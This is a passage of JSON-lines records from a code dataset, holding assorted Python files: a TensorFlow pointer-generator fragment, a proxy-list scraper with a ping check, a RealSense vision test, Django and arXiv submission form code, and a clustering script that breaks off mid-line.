tf.tile(batch_nums, [1, dec_len, enc_len])\r\n # (dec_len, )\r\n dec_len_nums = tf.range(0, limit=dec_len)\r\n # (1, dec_len)\r\n dec_len_nums = tf.expand_dims(dec_len_nums, 0)\r\n # (1, dec_len, 1)\r\n dec_len_nums = tf.expand_dims(dec_len_nums, 2)\r\n # tile是用来在不同维度上复制张量的\r\n # dec_len_nums (batch_size, dec_len, enc_len)\r\n dec_len_nums = tf.tile(dec_len_nums, [batch_size, 1, enc_len])\r\n # _enc_batch_extend_vocab_expand (batch_size, 1, enc_len)\r\n _enc_batch_extend_vocab_expand = tf.expand_dims(_enc_batch_extend_vocab, 1)\r\n # _enc_batch_extend_vocab_expand (batch_size, dec_len, enc_len)\r\n _enc_batch_extend_vocab_expand = tf.tile(_enc_batch_extend_vocab_expand, [1, dec_len, 1])\r\n\r\n # 因为要scatter到一个3D tensor上,所以最后一维是3\r\n # indices (batch_size, dec_len, enc_len, 3)\r\n indices = tf.stack((batch_nums, dec_len_nums, _enc_batch_extend_vocab_expand), axis=3)\r\n # 开始更新\r\n attn_dists_projected = tf.scatter_nd(indices, _attn_dists_pgn, shape)\r\n # 至此完成了公式的右半边\r\n # 计算最终分布\r\n final_dists = _vocab_dists_extended + attn_dists_projected\r\n return final_dists\r\n","sub_path":"PGN_remodel/PGN_model.py","file_name":"PGN_model.py","file_ext":"py","file_size_in_byte":7978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"595631617","text":"lista_numeros = []\nwhile True:\n valor = str(input('Digite um valor: '))\n if valor in lista_numeros:\n print('Valor duplicado! Não vou adicionar...')\n else:\n lista_numeros.append(valor)\n print('Valor adicionado com sucesso...')\n quer_continuar = ' '\n while quer_continuar not in 'SN':\n quer_continuar = str(input('Quer continuar [S/N]? ')).strip().upper()[0]\n if quer_continuar == 'N':\n break\nprint('-=-' * 15)\nprint('Voce digitou os valores: ', end='')\nlista_numeros.sort()\nfor valor in lista_numeros:\n print(valor, end=' ')\nprint()\n","sub_path":"Modulo - 3/Exercícios/ex079.py","file_name":"ex079.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"552009890","text":"# -*- coding:utf-8 -*-\nimport random\nimport re\nfrom lxml import etree\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport subprocess as sp\n\n\nclass Proxys(object):\n def __init__(self, page=1):\n # requests的Session可以自动保持cookie,不需要自己维护cookie内容\n self.S = requests.Session()\n # 西祠代理高匿IP地址\n self.target_url = 'http://www.xicidaili.com/nn/%d' % page\n # 完善的headers\n self.target_headers = {\n 'Upgrade-Insecure-Requests': '1',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',\n 'Referer': 'http://www.xicidaili.com/nn/',\n 'Accept-Encoding': 'gzip, deflate, sdch',\n 'Accept-Language': 'zh-CN,zh;q=0.9'\n }\n\n \"\"\"\n 函数说明:获取IP代理\n Parameters:\n page - 高匿代理页数,默认获取第一页\n Returns:\n proxys_list - 代理列表\n Modify:\n 2018-01-31\n \"\"\"\n\n def get_proxys(self):\n try:\n # get请求\n target_response = self.S.get(url=self.target_url, headers=self.target_headers)\n # utf-8编码\n target_response.encoding = 'utf-8'\n # 获取网页信息\n target_html = target_response.text\n # 获取id为ip_list的table\n bf1_ip_list = BeautifulSoup(target_html, 'lxml')\n bf2_ip_list = BeautifulSoup(str(bf1_ip_list.find_all(id='ip_list')), 'lxml')\n ip_list_info = bf2_ip_list.table.contents\n # 存储代理的列表\n proxys_list = []\n # 爬取每个代理信息\n for index in range(len(ip_list_info)):\n if index % 2 == 1 and index != 1:\n dom = etree.HTML(str(ip_list_info[index]))\n ip = dom.xpath('//td[2]')\n port = dom.xpath('//td[3]')\n protocol = dom.xpath('//td[6]')\n proxys_list.append(protocol[0].text.lower() + '#' + ip[0].text + '#' + port[0].text)\n # 返回代理列表\n return proxys_list\n except AttributeError:\n return None\n\n \"\"\"\n 函数说明:检查代理IP的连通性\n Parameters:\n ip - 代理的ip地址\n lose_time - 匹配丢包数\n waste_time - 匹配平均时间\n Returns:\n average_time - 代理ip平均耗时\n Modify:\n 2018-01-31\n \"\"\"\n\n def check_ip(self, ip):\n # 命令 -n 要发送的回显请求数 -w 等待每次回复的超时时间(毫秒)\n cmd = 'ping -n 3 -w 3 %s'\n # 执行命令\n p = sp.Popen(cmd % ip, stdin=sp.PIPE, stdout=sp.PIPE, stderr=sp.PIPE, shell=True)\n # 获得返回结果并解码\n out = p.stdout.read().decode('gbk')\n # 丢包数,平均时间\n lose_time, waste_time = self.initpattern(out)\n print(lose_time, waste_time)\n # 当匹配到丢失包信息失败,默认为三次请求全部丢包,丢包数lose赋值为3\n if len(lose_time) == 0:\n lose = 3\n else:\n lose = int(lose_time[0])\n if lose > 2:\n return 1000\n else:\n if len(waste_time) == 0:\n return 1000\n else:\n average_time = int(waste_time[0])\n return average_time\n\n def initpattern(self, output):\n lose_time = re.compile(u'丢失 = (\\d+)', re.IGNORECASE).findall(output)\n waste_time = re.compile(u'平均 = (\\d+)ms', re.IGNORECASE).findall(output)\n return lose_time, waste_time\n\n def get_proxy(self):\n proxy_dicts = []\n proxys_list = self.get_proxys()\n # if len(proxys_list) > 0:\n try:\n while len(proxys_list) > 90:\n proxy = random.choice(proxys_list)\n split_proxy = proxy.split('#')\n ip = split_proxy[1]\n average_time = self.check_ip(ip)\n if average_time > 200:\n proxys_list.remove(proxy)\n print(ip + '连接超时,ip重新获取中')\n if average_time < 200:\n proxys_list.remove(proxy)\n proxy_dict = {split_proxy[0]: split_proxy[1] + ':' + split_proxy[2]}\n proxy_dicts.append(proxy_dict)\n print('使用代理:', proxy_dicts)\n # continue\n return proxy_dicts\n except Exception as e:\n print(proxy_dicts, e)\n return proxy_dicts\n\n\nif __name__ == '__main__':\n proxys = Proxys(2)\n proxys.get_proxy()\n","sub_path":"test/create_proxys.py","file_name":"create_proxys.py","file_ext":"py","file_size_in_byte":4782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"398459753","text":"import pyrealsense2 as rs\nimport numpy as np\nimport cv2\n\n\"\"\"#Depth and color streams\npipeline = rs.pipeline()\nconfig = rs.config()\nconfig.enable_stream(rs.stream.depth, 1280, 720, rs.format.z16, 30) #enable_stream(source, width, height, format, fps)\nconfig.enable_stream(rs.stream.color, 1280, 720, rs.format.bgr8, 30) #Intel resources say 1280 & 720 is best for the depth calculations, then you want to downsize it later)\npipeline.start(config)\n\"\"\"\n\n# Initial Lower HSV threshold values(To be tuned later)\nlh = 0\nls = 0\nlv = 0\n\n# Initial Upper HSV threshold values (to be tunes later)\nuh = 180\nus = 255\nuv = 255\n\n#Empty coefficients list for first run\ncoefficients = []\n\nclass Threshold_manager:\n def __init__(self, lh, ls, lv, uh, us, uv):\n self.threshold_low = (lh,ls,lv)\n self.threshold_high = (uh,us,uv)\n\n def get_low(self):\n return self.threshold_low\n\n def get_high(self):\n return self.threshold_high\n\nclass Threshold_manager_debug:\n def __init__(self):\n self.lh = 22\n self.uh = 68\n self.ls = 53\n self.us = 107\n self.lv = 114\n self.uv = 254\n\n def on_low_H_thresh_trackbar(self, val):\n self.lh = val\n def on_high_H_thresh_trackbar(self, val):\n self.uh = val\n def on_low_S_thresh_trackbar(self, val):\n self.ls = val\n def on_high_S_thresh_trackbar(self, val):\n self.us = val\n def on_low_V_thresh_trackbar(self, val):\n self.lv = val\n def on_high_V_thresh_trackbar(self, val):\n self.uv = val\n\n def get_low(self):\n return (self.lh, self.ls, self.lv)\n def get_high(self):\n return (self.uh, self.us, self.uv)\n\nthreshold_values = Threshold_manager(lh, ls, lv, uh, us, uv)\ndebug = True\nif debug:\n import matplotlib.pyplot as plt\n threshold_values = Threshold_manager_debug()\n cv2.namedWindow(\"Threshold\")\n\n cv2.createTrackbar(\"low hue\", \"Threshold\", 0, 180, threshold_values.on_low_H_thresh_trackbar)\n cv2.createTrackbar(\"high hue\", \"Threshold\", 0, 180, threshold_values.on_high_H_thresh_trackbar)\n cv2.createTrackbar(\"low sat\", \"Threshold\", 0, 255, threshold_values.on_low_S_thresh_trackbar)\n cv2.createTrackbar(\"high sat\", \"Threshold\", 0, 255, threshold_values.on_high_S_thresh_trackbar)\n cv2.createTrackbar(\"low val\", \"Threshold\", 0, 255, threshold_values.on_low_V_thresh_trackbar)\n cv2.createTrackbar(\"high val\", \"Threshold\", 0, 255, threshold_values.on_high_V_thresh_trackbar)\n\n\n#In a dodgy try/catch so on exit (i.e. Ctrl-C) will still run the pipeline.close()\ntry:\n while True:\n #Wait for a coherent pair of depth & color frames\n #According to internet (implement later), should make sure takes picture from left camera\n frames = pipeline.wait_for_frames()\n depth_frame = frames.get_depth_frame()\n color_frame = frames.get_color_frame()\n if not depth_frame or not color_frame:\n continue #(Yikes - at some point should probably time how long it takes to get frames, move it into it's own thread if it's IO heavy)\n\n #Convert images to numpy arrays and resize them\n depth_image = cv2.resize(np.asanyarray(depth_frame.get_data()), (640, 360), interpolation=cv2.INTER_NEAREST)\n color_image = cv2.resize(np.asanyarray(color_frame.get_data()), (640, 360), interpolation=cv2.INTER_NEAREST)\n \n #color_image = cv2.imread('camera.jpg',1)\n\n #Process image:\n #Convert from RGB to HSV & threshold\n hsv_image = cv2.cvtColor(color_image, cv2.COLOR_BGR2HSV)\n #threshold_image = cv2.inRange(hsv_image, threshold_values.get_low(), threshold_values.get_high())\n threshold_image = cv2.inRange(hsv_image, (20,22,83), (57,134,171))\n\n if debug:\n # create trackbars for Upper and Lower HSV\n\n font = cv2.FONT_HERSHEY_SIMPLEX\n\n cv2.imshow(\"Threshold\", threshold_image)\n cv2.imshow(\"Raw input\", color_image)\n edges = cv2.Canny(threshold_image, 100, 200)\n (_, contours, _) = cv2.findContours(edges, cv2.RETR_LIST, cv2.CHAIN_APPROX_NONE)\n #Filter contours\n final_contours = []\n for contour in contours:\n area = cv2.contourArea(contour)\n if area > 500 and area < 90000:\n perimeter = cv2.arcLength(contour, True)\n if perimeter > 200 and perimeter < 3000:\n #Is supposed to approximate the area, but just kinda makes everything go funny\n #approx_contour = cv2.approxPolyDP(contour, 0.01*perimeter, True)\n final_contours.append(contour)\n contour_image = cv2.drawContours(color_image, final_contours, -1, (255,255,0),2)\n cv2.imshow(\"CANNY\", edges)\n cv2.imshow(\"Contours\", contour_image)\n if len(final_contours) > 0:\n final_contours.sort(key=lambda x: cv2.contourArea(x), reverse=True)\n bins = [[] for x in range(10)]\n fraction = int(len(color_image)/10)\n for point in final_contours[0]:\n bins[int(point[0][1]/fraction)].append(point[0])\n midpoints = []\n for contour in bins:\n contour = np.array(contour, dtype=np.int32).reshape((-1,1,2))\n contour = cv2.convexHull(contour, False)\n contour_image = cv2.drawContours(color_image, [contour], -1, (255, 0, 255), 2)\n moments = cv2.moments(contour)\n if moments[\"m00\"] != 0:\n midpoints.append((int(moments[\"m10\"] / moments[\"m00\"]), int(moments[\"m01\"] / moments[\"m00\"])))\n for line in range(len(midpoints)-1):\n contour_image = cv2.line(contour_image, midpoints[line], midpoints[line+1], (0,255,255), 2)\n cv2.imshow(\"dfe\", contour_image)\n \"\"\"images = []\n for i in range(10):\n edges = cv2.Canny(np.array(threshold_image[fraction*i, fraction*(i+1)]), 100, 200)\n (_, contours, _) = cv2.findContours(edges, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)\n cv2.imshow(\"{} canny\".format(i), edges)\n canny_output = cv2.drawContours(color_image[fraction*i:fraction*(i+1)], contours, -1, (255,255,0),10)\n cv2.imshow(\"{} section\".format(i), canny_output)\n images.append(canny_output)\n cv2.imshow('Contours', np.vstack(images))\"\"\"\n cv2.waitKey(1)\nfinally:\n #cv2.imwrite(\"camera.jpg\", color_image)\n pipeline.stop()\n","sub_path":"test-code/vision-sliding-box-test-camera.py","file_name":"vision-sliding-box-test-camera.py","file_ext":"py","file_size_in_byte":6624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"487551507","text":"from django.conf.urls import url\nfrom . import views\nfrom django.http import HttpResponse\nfrom django.views.generic import TemplateView\n\nurlpatterns = [\n url(r'^$', views.index),\n url(r'^about/', views.about),\n url(r'^analy/', views.analy),\n url(r'^integration/', views.integration),\n url(r'^market/', views.market),\n url(r'^track/', views.track),\n url(r'^careers/', views.careers),\n\turl(r'^google323523d1a2bbb38c\\.html$', lambda r: HttpResponse(\"google-site-verification: google323523d1a2bbb38c.html\", content_type=\"text/plain\")),\n\turl(r'^sitemap\\.xml$', TemplateView.as_view(template_name='sitemap.xml')),\n\turl(r'^index/', views.index, name='index'),\n]","sub_path":"elaapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"19934527","text":"# -*- coding: UTF-8 -*-\nfrom django.contrib.auth.models import User\nfrom django.db import IntegrityError\nfrom DeBar.classes import Text\nfrom DeBar.classes.cadastros.cargo import C_Cargo\nfrom DeBar.classes.cadastros.classecadastro import C_Cadastro\n\nfrom DeBar.classes.usuario.email import Email\nfrom DeBar.classes.usuario.nome import Nome\nfrom DeBar.classes.usuario.nomeusuario import NomeUsuario\nfrom DeBar.classes.usuario.senha import Senha\nfrom DeBar.models import Cargo\n\n\nclass C_User(C_Cadastro):\n\n def __init__(self, request, objeto, username, nome, email, senha, senharepetida = None, id =None):\n super(C_User, self).__init__(request, objeto, id)\n\n self.username = None\n self.nome = None\n self.senha = None\n self.email = None\n self.senhaRepetida = senharepetida\n\n\n if not self.isvalido:\n self.setUsername(username)\n\n if self.username.isvalido:\n self.objeto = User.objects.create_user(self.username.valor)\n\n self.setNome(nome)\n self.setEmail(email)\n self.setSenha(senha, senharepetida)\n\n\n############################################################################################################\n############################################################################################################\n def setUsername(self, username):\n\n if isinstance(username, NomeUsuario):\n self.username = username\n else:\n self.username = NomeUsuario(username)\n\n try:\n teste = User.objects.get(username=self.username.valor)\n self.username.mensagem = Text().usuario_mesmo_username()\n self.username.isvalido = False\n except:\n self.objeto.username = self.username.valor\n self.valida()\n\n\n############################################################################################################\n############################################################################################################\n\n def setNome(self, nome):\n\n if isinstance(nome, Nome):\n\n self.nome = nome\n\n else:\n self.nome = Nome(nome)\n\n if self.nome.isvalido:\n self.objeto.first_name = self.nome.nome\n self.objeto.last_name = self.nome.sobrenome\n\n self.valida()\n\n############################################################################################################\n############################################################################################################\n\n def setSenha(self, senha, senhaRepetida):\n\n if isinstance(senha, Senha):\n self.senha = senha\n else:\n self.senha = Senha(senha, senhaRepetida)\n\n if self.senha.isvalido:\n self.objeto.password = self.senha.valor\n\n self.valida()\n\n############################################################################################################\n############################################################################################################\n\n def setEmail(self, email):\n\n if isinstance(email, Email):\n self.email = email\n else:\n self.email = Email(email)\n\n if self.email.isvalido:\n self.objeto.email = self.email.valor\n\n self.valida()\n############################################################################################################\n############################################################################################################\n\n def valida(self):\n\n try:\n if self.username.isvalido:\n if self.nome.isvalido:\n if self.senha.isvalido:\n if self.email.isvalido:\n self.isvalido = True\n else:\n self.mensagem = self.email.mensagem\n return False\n else:\n self.mensagem = self.senha.mensagem\n return False\n else:\n self.mensagem = self.nome.mensagem\n return False\n else:\n self.mensagem = self.username.mensagem\n return False\n\n except:\n return False\n\n############################################################################################################\n############################################################################################################\n\n def toJson(self):\n\n dict = super(C_User, self).toJson()\n\n if self.nome:\n dict.update({'nome': self.nome.toJson()})\n else:\n dict.update({'nome': self.objeto.first_name + \" \" + self.objeto.last_name})\n\n if self.username:\n dict.update({'username': self.username.toJson()})\n else:\n dict.update({'username': self.objeto.username})\n\n if self.senha:\n dict.update({'senha': self.senha.toJson()})\n else:\n dict.update({'senha': self.objeto.password})\n\n\n if self.email:\n dict.update({'email': self.email.toJson()})\n else:\n dict.update({'email': self.objeto.email})\n\n dict.update({'isvalido': self.isvalido})\n\n try:\n dict.update({'senhaRepetida': self.senha.senhaRepetida})\n except:\n pass\n\n return dict\n\n############################################################################################################\n############################################################################################################\n\n def ativar(self):\n\n if self.objeto.is_active:\n self.objeto.is_active = False\n else:\n self.objeto.is_active = True\n############################################################################################################\n############################################################################################################\n\n def save(self):\n\n try:\n self.objeto.set_password(self.senha.valor)\n self.objeto.save()\n\n except IntegrityError:\n self.mensagem = Text().usuario_mesmo_username()\n\n except:\n self.mensagem = Text().erro_banco_criar_usuario()\n\n############################################################################################################\n############################################################################################################\n\n def delete(self):\n\n self.objeto.delete()","sub_path":"DeBar/classes/usuario/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":6583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"319600943","text":"\"\"\"\nController for classification actinos.\n\nCreates an event of type `core.events.event.SetPrimaryClassification`\nCreates an event of type `core.events.event.AddSecondaryClassification`\n\"\"\"\nfrom typing import Tuple, Dict, Any, List, Optional\nfrom werkzeug import MultiDict\nfrom werkzeug.exceptions import InternalServerError\nfrom flask import url_for\nfrom wtforms import SelectField, widgets, HiddenField, validators\n\nfrom arxiv import status, taxonomy\nfrom arxiv.forms import csrf\nfrom arxiv.base import logging\nfrom arxiv.users.domain import Session\nimport arxiv.submission as events\nfrom ..domain import SubmissionStage\nfrom ..util import load_submission\nfrom . import util\n\n# from arxiv-submission-core.events.event import ConfirmContactInformation\n\nlogger = logging.getLogger(__name__) # pylint: disable=C0103\n\nResponse = Tuple[Dict[str, Any], int, Dict[str, Any]] # pylint: disable=C0103\n\n\nclass ClassificationForm(csrf.CSRFForm):\n \"\"\"Form for classification selection.\"\"\"\n\n CATEGORIES = [\n (archive['name'], [\n (category_id, f\"{category['name']} ({category_id})\")\n for category_id, category in taxonomy.CATEGORIES_ACTIVE.items()\n if category['in_archive'] == archive_id\n ])\n for archive_id, archive in taxonomy.ARCHIVES_ACTIVE.items()\n ]\n \"\"\"Categories grouped by archive.\"\"\"\n\n ADD = 'add'\n REMOVE = 'remove'\n OPERATIONS = [\n (ADD, 'Add'),\n (REMOVE, 'Remove')\n ]\n operation = HiddenField(default=ADD, validators=[validators.optional()])\n category = util.OptGroupSelectField('Category', choices=CATEGORIES,\n default='')\n\n def filter_choices(self, submission: events.domain.Submission,\n session: Session, allowed: Optional[List[str]] = None) \\\n -> None:\n \"\"\"Remove redundant choices, and limit to endorsed categories.\"\"\"\n selected = self.category.data\n primary = submission.primary_classification\n\n choices = [\n (archive, [\n (category, display) for category, display in archive_choices\n if ((allowed is None or category in allowed)\n and (primary is None or category != primary.category)\n and category not in submission.secondary_categories)\n or category == selected\n ])\n for archive, archive_choices in self.category.choices\n ]\n self.category.choices = [\n (archive, _choices) for archive, _choices in choices\n if len(_choices) > 0\n ]\n\n @classmethod\n def formset(cls, submission: events.domain.Submission) \\\n -> Dict[str, 'ClassificationForm']:\n \"\"\"Generate a set of forms used to remove cross-list categories.\"\"\"\n formset = {}\n if hasattr(submission, 'secondary_classification') and \\\n submission.secondary_classification:\n for secondary in submission.secondary_classification:\n this_category = str(secondary.category)\n subform = cls(operation=cls.REMOVE, category=this_category)\n subform.category.widget = widgets.HiddenInput()\n formset[secondary.category] = subform\n return formset\n\n\ndef _data_from_submission(params: MultiDict,\n submission: events.domain.Submission) -> MultiDict:\n if submission.primary_classification \\\n and submission.primary_classification.category:\n params['category'] = submission.primary_classification.category\n return params\n\n\ndef classification(method: str, params: MultiDict, session: Session,\n submission_id: int) -> Response:\n \"\"\"Generate a `SetPrimaryClassification` event.\"\"\"\n submitter, client = util.user_and_client_from_session(session)\n\n # Will raise NotFound if there is no such submission.\n submission, submission_events = load_submission(submission_id)\n\n # The form should be prepopulated based on the current state of the\n # submission.\n if method == 'GET':\n params = _data_from_submission(params, submission)\n if 'category' not in params:\n params['category'] = session.user.profile.default_category.compound\n\n params['operation'] = ClassificationForm.ADD # Always add a primary.\n\n form = ClassificationForm(params)\n # We want categories in dot-delimited \"compound\" format.\n\n form.filter_choices(submission, session, submitter.endorsements)\n response_data = {\n 'submission_id': submission_id,\n 'form': form,\n 'submission': submission,\n 'submitter': submitter\n }\n\n if method == 'POST':\n if form.validate():\n logger.debug('Form is valid, with data: %s', str(form.data))\n category = form.category.data\n\n # If already selected, nothing more to do.\n if not submission.primary_classification \\\n or submission.primary_classification.category != category:\n try:\n logger.debug('Setting new primary: %s', category)\n # Create SetLicense event\n submission, stack = events.save( # pylint: disable=W0612\n events.SetPrimaryClassification(creator=submitter,\n category=category),\n submission_id=submission_id\n )\n except events.exceptions.InvalidStack as e:\n logger.error('Could not set primary: %s', str(e))\n form.errors # Causes the form to initialize errors.\n form._errors['events'] = [ie.message for ie\n in e.event_exceptions]\n logger.debug('InvalidStack; return bad request')\n return response_data, status.HTTP_400_BAD_REQUEST, {}\n except events.exceptions.SaveError as e:\n logger.error('Could not save primary event')\n raise InternalServerError(\n 'There was a problem saving this operation'\n ) from e\n else: # Form data were invalid.\n logger.debug('Invalid form data; return bad request')\n return response_data, status.HTTP_400_BAD_REQUEST, {}\n if params.get('action') in ['previous', 'save_exit', 'next']:\n logger.debug('Redirect to %s', params.get('action'))\n return response_data, status.HTTP_303_SEE_OTHER, {}\n logger.debug('Nothing to do, return 200')\n return response_data, status.HTTP_200_OK, {}\n\n\ndef cross_list(method: str, params: MultiDict, session: Session,\n submission_id: int) -> Response:\n \"\"\"Generate an `AddSecondaryClassification` event.\"\"\"\n submitter, client = util.user_and_client_from_session(session)\n\n # Will raise NotFound if there is no such submission.\n submission, submission_events = load_submission(submission_id)\n\n # We need forms for existing secondaries, to generate removal requests.\n formset = ClassificationForm.formset(submission)\n\n # This form handles additions and removals.\n form = ClassificationForm(params)\n form.operation._value = lambda: form.operation.data\n form.filter_choices(submission, session)\n _primary = taxonomy.CATEGORIES[submission.primary_classification.category]\n response_data = {\n 'submission_id': submission_id,\n 'form': form,\n 'formset': formset,\n 'primary': {\n 'id': submission.primary_classification.category,\n 'name': _primary['name']\n },\n\n }\n action = params.get('action')\n\n if method == 'POST':\n # Since the interface provides an \"add\" button to add cross-list\n # categories, we only want to handle the form data if the user is not\n # attempting to move to a different step.\n if not action:\n if form.validate():\n logger.debug('Form is valid, with data: %s', str(form.data))\n category = form.category.data\n operation = form.operation.data\n try:\n if operation == ClassificationForm.REMOVE:\n submission, _ = events.save( # pylint: disable=W0612\n events.RemoveSecondaryClassification(\n creator=submitter,\n category=category\n ),\n submission_id=submission_id\n )\n elif operation == ClassificationForm.ADD:\n submission, _ = events.save( # pylint: disable=W0612\n events.AddSecondaryClassification(\n creator=submitter,\n category=category\n ),\n submission_id=submission_id\n )\n except events.exceptions.InvalidStack as e:\n logger.error('Could not add secondary: %s', str(e))\n form.errors # Causes the form to initialize errors.\n form._errors['events'] = [ie.message for ie\n in e.event_exceptions]\n logger.debug('InvalidStack; return bad request')\n return response_data, status.HTTP_400_BAD_REQUEST, {}\n except events.exceptions.SaveError as e:\n logger.error('Could not save primary event')\n raise InternalServerError(\n 'There was a problem saving this operation'\n ) from e\n\n # Re-build the formset, to reflect changes that we just made.\n response_data['formset'] = \\\n ClassificationForm.formset(submission)\n # We want a fresh form here, since the POSTed data should now\n # be reflected in the formset.\n form = ClassificationForm()\n form.operation._value = lambda: form.operation.data\n form.filter_choices(submission, session)\n response_data['form'] = form\n\n else: # Form data were invalid.\n logger.debug('Invalid form data; return bad request')\n return response_data, status.HTTP_400_BAD_REQUEST, {}\n\n if action in ['previous', 'save_exit', 'next']:\n logger.debug('Redirect to %s', params.get('action'))\n return response_data, status.HTTP_303_SEE_OTHER, {}\n logger.debug('Nothing to do, return 200')\n return response_data, status.HTTP_200_OK, {}\n","sub_path":"submit/controllers/classification.py","file_name":"classification.py","file_ext":"py","file_size_in_byte":10767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"403671976","text":"# Тут лежат функции, поставляющие какие-то данные. Допустим, запрос на получение юзера из БД\nimport os\nfrom typing import Optional\nfrom base.provider import BaseProvider\nfrom .schemas import User, Coach, Reviews\n\n\nclass Provider(BaseProvider):\n def __init__(self):\n super().__init__('user')\n\n def get_user_id(self, steam_id: str) -> Optional[int]:\n user_id = self.exec_by_file('get_user_id.tmpl', {'steam_id': steam_id})\n return user_id[0].get('id') if user_id else None\n\n def get_user(self, user_id: int) -> dict:\n user_info = self.exec_by_file('get_user.tmpl', {'id': user_id})[0]\n user_info['le_pararms'] = {}\n if user_info.get('reviews_learner'):\n rating = []\n sociability = []\n adequacy = []\n qualification = []\n for record in user_info.get('reviews_learner'):\n rating.append(record.get('rating'))\n sociability.append(record.get('sociability'))\n adequacy.append(record.get('adequacy'))\n qualification.append(record.get('qualification'))\n user_info['le_pararms']['rating'] = sum(rating) / len(rating) if rating else None\n user_info['le_pararms']['sociability'] = sum(sociability) / len(sociability) if sociability else None\n user_info['le_pararms']['adequacy'] = sum(adequacy) / len(adequacy) if adequacy else None\n user_info['le_pararms']['qualification'] = sum(qualification) / len(qualification) if qualification else None\n else:\n user_info['le_pararms']['rating'] = None\n user_info['le_pararms']['sociability'] = None\n user_info['le_pararms']['adequacy'] = None\n user_info['le_pararms']['qualification'] = None\n user_info['co_pararms'] = {}\n if user_info.get('reviews_coach'):\n rating = []\n sociability = []\n adequacy = []\n qualification = []\n for record in user_info.get('reviews_coach'):\n rating.append(record.get('rating'))\n sociability.append(record.get('sociability'))\n adequacy.append(record.get('adequacy'))\n qualification.append(record.get('qualification'))\n user_info['co_pararms']['rating'] = sum(rating)/len(rating) if rating else None\n user_info['co_pararms']['sociability'] = sum(sociability) / len(sociability) if sociability else None\n user_info['co_pararms']['adequacy'] = sum(adequacy) / len(adequacy) if adequacy else None\n user_info['co_pararms']['qualification'] = sum(qualification) / len(qualification) if qualification else None\n else:\n user_info['co_pararms']['rating'] = None\n user_info['co_pararms']['sociability'] = None\n user_info['co_pararms']['adequacy'] = None\n user_info['co_pararms']['qualification'] = None\n return user_info\n\n def add_user(self, user_dict: dict) -> int:\n return self.exec_by_file('add_user.tmpl', user_dict)[0].get('id')\n\n def change_user(self, user_dict: User) -> dict:\n self.exec_by_file('change_user.tmpl', user_dict.dict())\n if user_dict.dict().get('games_user') is not None:\n for game in user_dict.dict().get('games_user'):\n self.exec_by_file('user_games.tmpl', game)\n if user_dict.dict().get('reviews_learner') is not None:\n for review in user_dict.dict().get('reviews_learner'):\n self.exec_by_file('reviews_learner.tmpl', review)\n if user_dict.dict().get('reviews_coach') is not None:\n for review in user_dict.dict().get('reviews_coach'):\n self.exec_by_file('reviews_coach.tmpl', review)\n if user_dict.dict().get('learners_learner') is not None:\n for review in user_dict.dict().get('learners_learner'):\n self.exec_by_file('learners.tmpl', review)\n if user_dict.dict().get('learners_coach') is not None:\n for review in user_dict.dict().get('learners_coach'):\n self.exec_by_file('learners.tmpl', review)\n return user_dict.dict()\n\n def get_coach(self, coach_dict: Coach) -> list:\n coach = self.exec_by_file('get_coach.tmpl', coach_dict.dict())\n if coach_dict.dict().get('id_game') is not None:\n id_game = coach_dict.dict().get('id_game')\n coach = list(filter(lambda x: x.get('id_game') == id_game, coach))\n coach = sorted(coach, key=lambda x: x.get('rating'), reverse=True)\n return coach\n\n def set_reviews(self, reviews_dict: Reviews) -> None:\n status = self.exec_by_file('get_learns.tmpl', reviews_dict.dict())\n if status:\n self.exec_by_file('set_reviews.tmpl', reviews_dict.dict())\n","sub_path":"web/apps/user/provider.py","file_name":"provider.py","file_ext":"py","file_size_in_byte":4886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"358152012","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jun 30 14:50:05 2018\n\n@author: ankit\n\"\"\"\n# Importing the libraries\nimport numpy as np\n#%matplotlib inline\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nclass Algorithms():\n def __init__(self):\n pass\n\n def pca_compute(self, X_train, X_test, i):\n # Applying PCA\n from sklearn.decomposition import PCA\n pca = PCA(n_components = i)\n X_train = pca.fit_transform(X_train)\n X_test = pca.transform(X_test)\n\n return X_train, X_test\n\n def lda_compute(self, X_train, X_test, y_train, i):\n #applying LDA\n from sklearn.discriminant_analysis import LinearDiscriminantAnalysis as LDA\n lda = LDA(n_components = i)\n X_train = lda.fit_transform(X_train, y_train)\n X_test = lda.transform(X_test)\n\n return X_train, X_test\n\n def scatter_plot(self, X_train, tmp, tmp2):\n #visualizing the training data\n plt.scatter(X_train[:,0], X_train[:,1], marker='.', c='r')\n plt.title('Visualize ' + tmp + ' results (' + tmp2 + ' data)')\n plt.xlabel(tmp + '1')\n plt.ylabel(tmp + '2')\n plt.show()\n\n\n def clustering(self, X, name):\n #Applying K-Means clustering\n from sklearn.cluster import KMeans\n wcss = []\n for i in range(1,12):\n kmeans = KMeans(n_clusters=i, init='k-means++', max_iter=300, n_init = 10, random_state=0)\n kmeans.fit(X)\n wcss.append(kmeans.inertia_)\n\n #visualizing the WCSS curve\n plt.plot(range(1,12), wcss)\n plt.title('The Elbow method (' + name + ' Data)')\n plt.xlabel('# of clusters')\n plt.ylabel('WCSS')\n plt.show()\n\n\n #applying k-means to dataset\n kmeans = KMeans(n_clusters = 11, random_state = 0, init='k-means++', max_iter=300, n_init = 10)\n y_kmeans = kmeans.fit_predict(X)\n\n\n if name != 'Input':\n \t #visualizing the clusters\n 